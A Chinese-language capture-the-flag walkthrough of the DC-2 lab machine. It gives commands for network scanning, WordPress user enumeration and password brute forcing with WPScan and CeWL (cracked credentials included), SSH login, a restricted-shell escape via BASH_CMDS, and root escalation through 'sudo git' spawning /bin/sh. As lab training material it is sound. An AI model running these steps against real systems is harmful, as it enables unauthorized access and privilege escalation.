DC-2通关讲解

DC-2通关讲解

打开dc-2虚拟机查看ip：192.168.×××.×××

确保攻击机与靶机在同一网络段通常设置为桥接模式或NAT模式。

使用nmap工具发现在同一桥段下的ip地址

nmap -sP 192.168.132.128/24

探测端口及服务：使用命令探测开放的端口

nmap -A -p- -v 192.168.132.130

探测开放俩个端口，80默认端口和7744端口。

访问web端口 （找不到服务器）

解析失败，我们需要更改hosts文件，添加一个ip域名指向。

修改hosts文件，添加靶机IP到域名dc-2的指向

添加完成后再次访问即可访问成功

在网站中点到flag发现是flag1

我们可以使用dirb命令进行目录扫描，看看网站下有什么东西

dirb http://dc-2

这其中有很多后台地址，但似乎没有什么有用的东西

打开进入网站登录页面

用户枚举再尝试利用枚举到的用户爆破密码

wpscan --url http://dc-2 --enumerate u 枚举拿到网址的用户

有三个用户 admin，Jerry，tom

WPScan是Kali Linux默认自带的一款漏洞扫描工具，它采用Ruby编写，能够扫描WordPress网站中的多种安全漏洞，其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞，并且支持最新版本的WordPress。值得注意的是，它不仅能够扫描类似robots.txt这样的敏感文件，而且还能够检测当前已启用的插件和其他功能。

密码枚举爆破

爆破用户名和密码

这里可以使用-w参数来将密码字典存储为text文件：

cewl http://dc-2/ -w dc2.txt 

使用wpscan进行暴力破解

wpscan --url http://dc-2 --passwords dc2.txt

拿到爆破账号和密码

Jerry;adipiscing

Tom;parturient

接着我们进入后台

用Jerry;adipiscing登录站点

用Tom;parturient登录站点

进入jerry账号登录拿到flag2

如果你不能利用WordPress并采取一条捷径，还有另外一种方法。

希望你找到了另一个入口。

不用word press想到了ssh端口服务

用tom账号登录

登录ssh；ssh tom@192.168.66.141 -p 7744

看到了flag3.txt

发现cat flag3.txt找不到命令

我这里把查看命令都尝试了一遍 less和vi可以来查看，

查看可以使用的命令

echo $PATH

cd进不去目录 使用ls直接查看目录信息

依次输入不要一次性输入

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

echo /*

cd ../

cd ./jerry

在jreey目录发现flag4.txt

翻译：很高兴看到你走到这一步——但你还没有到家。

你还需要获取最后的标志（唯一真正重要的标志！！！）。

这里没有提示——你现在得靠自己了。 :-)

继续——从这里滚出去！！！！

使用tom用户无权限运行sudo 我们切换到jerry用户

我们可以看到无需root权限，jerry 可以使用 git

sudo -l  

查看一下可以使用的root权限命令

find / -user root -perm -4000 -print 2>/dev/null

用户不可以直接sudo su

使用git命令进行提取

sudo git help status

输入！/bin/sh

提权成功

发现final-flag.txt

cd /root

cat final-flag.txt